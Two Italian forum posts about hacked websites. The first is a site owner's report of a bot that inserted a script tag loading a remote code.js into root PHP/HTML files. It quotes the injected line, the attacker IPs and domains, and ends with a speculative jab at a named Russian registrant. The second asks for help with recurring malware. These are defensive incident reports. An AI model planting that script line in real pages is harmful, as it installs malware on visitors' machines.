Malware su sito, come evitarlo
Salve a tutti!
Oggi alcuni utenti del forum di Nonciclopedia ci hanno segnalato un malware.
Purtroppo la cosa non mi è suonata nuova, perché in questi giorni ho riscontrato personalmente lo stesso problema su alcuni siti con un altro hosting.
Ma a quanto pare il problema è molto diffuso (basta guardare le segnalazioni recenti che avete avuto qui stesso: 1, 2, 3, 4, 5, ecc ecc)
Mentre su google si trova ancora poca roba, per lo più altri siti infetti ed una ragazza (vostra utente, pare) che si lamenta sul forum di phpBB.
Intanto vorrei sapere dove poter controllare gli accessi ftp o quelli al pannello di controllo... spero che non li forniate solo se richiesti dalla Polpost. (scusate la frecciatina, ma non avendo mai ricevuto risposta su questo argomento, era dovuta. Comunque ormai non serve più una risposta, l'abbiamo scoperto da soli.)
Poi capire anche se è la stessa cosa (o simile) che sta succedendo agli altri utenti.
Ed infine capire COME hanno fatto ad accedere a siti diversi, con hosting diversi e cms diversi (o anche nessun cms).
Nei siti che ho potuto controllare l'IP 95.211.43.6 era sempre lo stesso, per esempio:
Mon Apr 02 01:51:20 2012 0 95.211.43.6
Mon Apr 02 01:51:21 2012 0 95.211.43.6
Mon Apr 02 01:51:23 2012 1 95.211.43.6
Mon Apr 02 01:51:25 2012 0 95.211.43.6
Mon Apr 02 01:51:26 2012 0 95.211.43.6
...e come potete notare le modifiche fatte sono consecutive nell'arco di pochi secondi, quindi sarà stato usato un bot.
Le modifiche fatte sono più o meno sempre le stesse:
1) sono stati modificati tutti i php ed html (qualche volta anche txt) nelle sole cartelle di root
2) la modifica consiste nell'inserimento della riga
Codice:
<script type="text/javascript" src="http://unitedsquashleague.com/players/code.js"></script>
Il risultato è l'avvio di Java e seguente installazione di malware nel sistema operativo, consiglio quindi a tutti, per precauzione, di disabilitare i plugin Java... almeno per adesso.
Quindi sono andato nella root, ho ripulito dalla riga i file modificati di recente ed è tornato tutto normale.
Facendo un po' di "indagini", l'IP è Olandese e della Leaseweb. Quindi l'attacco potrebbe provenire da un server-zombie. Ma non solo:
1) UnitedSquashLeague.com a quanto pare è un vecchio dominio e quindi forse è un'altra vittima... in quel code.js (che tra l'altro nel sito non compare da nessuna parte, sembra pulito... forse l'hanno usato solo come redirect) c'è un iframe richiama invece un altro sito, helpindowns.in, un sito fantasma che è stato registrato abbastanza di recente per la prima volta in assoluto, e sarà il colpevole perché se guardate tra i dati del Registrant si nota che sono farlocchi (città "NewYourk", tel +1.1231231, ecc)
2) questo helpindowns usa afraid.org come DNS, un sito che offre DNS gratis, quindi penso non abbia manco l'hosting ma solo il dominio. Sempre dal whois si vede che il server ha un ip generico 188.72.194.251 che andando a controllare, in fondo, dice che appartiene a Leaseweb Germany... qui il collegamento con l'IP colpevole. Tra l'altro nel campo "Reverse IP:" dice <<3 websites use this address. (examples: helpindowns.in helpindownx.in helpindownz.in) >>, magari sono altri siti-fantoccio.
3) Nel whois dell'ip 188.72.194.251 c'è anche un riferimento ad un hostmaniac.com (whois) che per essere un hosting non ha sito, quindi sarà un altro fantoccio, registrato da un certo Anton Sogreev... un russo, guarda un po'. :wink:
Ora, al di là della semplice pulizia, come bisogna comportarsi?
Segnalare ad unitedsquashleague.com che hanno quel js infetto?
Segnalare a Leaseweb l'IP e i vari hosting fantoccio?
Che altro?
(...forse se pinnate il topic evitate agli altri di aprirne di nuovi)
Impossibile rimuovere un malware
Buongiorno,
ho deciso di rivolgermi a qualcuno qui perché non so più cosa fare...
è dal 28/03 circa che miei utenti mi segnalano l'attacco di un malware sul nostro sito, ma solo su due cartelle specifiche (altre che contengono gli stessi file non risultano avere problemi).
Premesso che ho provato a:
1) eliminare dal file infetto il codice malware
2) sostituire i file segnalati come infetti con copia sana
3) sovrascrivere le sottocartella dove veniva segnalato l file infetto con copia sana
4) sovrascrivere tutte le cartelle infette con copia sana
5) cancellare completamente e ricaricare le cartelle infette
Premesso che i file che carico dal mio computer sono affidabili al 100% (effettuate scansioni complete, cancellazioni cache e quant'altro possibile)
A oggi continua a ripresentarsi il problema.
Come posso fare? Qualcuno è in grado di darmi una mano?
Ringrazio anticipatamente per l'attenzione